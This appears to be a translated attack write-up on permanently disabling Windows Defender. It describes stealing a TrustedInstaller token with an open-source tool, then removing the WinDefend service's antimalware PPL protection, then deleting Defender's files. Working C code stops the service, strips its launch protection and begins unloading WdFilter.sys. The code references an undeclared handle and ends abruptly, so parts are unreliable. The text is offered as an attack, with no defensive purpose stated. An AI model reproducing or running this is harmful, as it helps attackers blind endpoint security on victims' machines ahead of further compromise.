describe
You can turn off the Windows Defender service, remove ppl protection by raising permissions, and then delete DLL s and other files in Windows Defender, so that the Windows Defender service cannot run, resulting in a denial of service.
Attack steps
1. Upgrade permissions to trustedinstaller
We use the trusted installer group token to automatically steal the system token to enhance the privileges of the trusted installer,
Here, we use an open source tool to take advantage of it:
https://github.com/0xbadjuju/Tokenvator.
Raise the permission to the TrustedInstaller and use this permission to open a new CMD exe
At the same time, this CMD Exe also has TrustedInstaller permission.
2. Close the Windows Defender service
In fact, this is not a vulnerability, because our administrator permissions can also directly and temporarily shut down the Windows Defender service.
However, closing the Windows Defender service in this way can be opened manually and restarted automatically. What we want is to close the Windows Defender service forever. In the hacker's idea, the target is that there is no way to start the Windows Defender service again, except for reinstalling the system. Ha ha ha....
3. Remove the psprotectsignerantimalware light protection
Quick background on "protection":
Protection process first appeared in windows vista as an enhancement of key windows user mode services, and later evolved into protection process (PPL) in windows 8.1 In general, executables must be signed with a special certificate before it is possible to use a protected process (PPL).
In Microsoft documents, we can know:
https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-changeserviceconfig2w
As long as we have sufficient access to the service object, we can change the service protection. That is, we can turn off the ppl of Windows Defender service. After testing, we know that the service ACL does not allow SYSTEM users and administrator groups to modify or stop the Windows Defender service at all. However, it allows WinDefend and TrustedInstaller to modify or stop the ppl of Windows Defender service, so we have full TrustedInstaller permission above.
Then we can disable psprotectsignerantimalware light of Windows Defender service, and then modify and delete the necessary components of Windows Defender to shut down Windows Defender service forever.
The file saving path of Windows Defender is:
C:\Program Files\Windows Defender C:\Program Files\Windows Defender Advanced Threat Protection C:\Program Files (x86)\Windows Defender
We cannot make any changes to these files with PPL.
Similarly, modification and other operations cannot be performed in the TrustedInstaller permission.
Then we can use the TrustedInstaller permission to stop psprotectsignerantimalware light protection through ChangeServiceConfig2W, and then modify and delete the necessary components for Windows Defender to shut down the Windows Defender service forever.
SC_HANDLE tt = OpenSCManager(NULL, NULL, GENERIC_READ);//Establish a connection to the service control manager
SC_HANDLE windefend_svc = OpenServiceW(tt, L"WinDefend", SERVICE_START | SERVICE_STOP | GENERIC_READ | SERVICE_CHANGE_CONFIG | SERVICE_USER_DEFINED_CONTROL);
//Open an existing service. Open wdf the service
if (windefend_svc == NULL) {
printf("\n[-] Failed to open WinDefend service.");
return 1;
}
printf("Done.\n");
SERVICE_STATUS svc_status;
if (!ControlService(windefend_svc, SERVICE_CONTROL_STOP, &svc_status)) {
//Stop WDF service
printf("[-] Failed to stop WinDefend service :(");
return 1;
}
printf("[+] Successfully sent service stop control.\n");
SERVICE_LAUNCH_PROTECTED_INFO info;
DWORD ret_sz = 0;
QueryServiceConfig2W(windefend_svc, SERVICE_CONFIG_LAUNCH_PROTECTED, (LPBYTE)&info, sizeof(SERVICE_LAUNCH_PROTECTED_INFO), &ret_sz);
//Retrieves optional configuration parameters for the WDF service.
if (info.dwLaunchProtected == SERVICE_LAUNCH_PROTECTED_NONE)
goto WaitDefender;
info.dwLaunchProtected = SERVICE_LAUNCH_PROTECTED_NONE;
if (!ChangeServiceConfig2W(windefend_svc, SERVICE_CONFIG_LAUNCH_PROTECTED, &info)) {
printf("[-] Failed to remove PsProtectSignerAntimalware-Light from WinDefend service :(");
return 1;
}
printf("[+] Successfully removed PsProtectSignerAntimalware-Light from WinDefend service.\n");
WaitDefender:
printf("[*] Waiting WinDefend to stop .!\n");
WaitForSingleObject(hwindefend, INFINITE);
CloseHandle(hwindefend);
printf("[!] Attempting to unload WdFilter.sys ... ");Then modify and delete the necessary components of Windows Defender to shut down the Windows Defender service forever.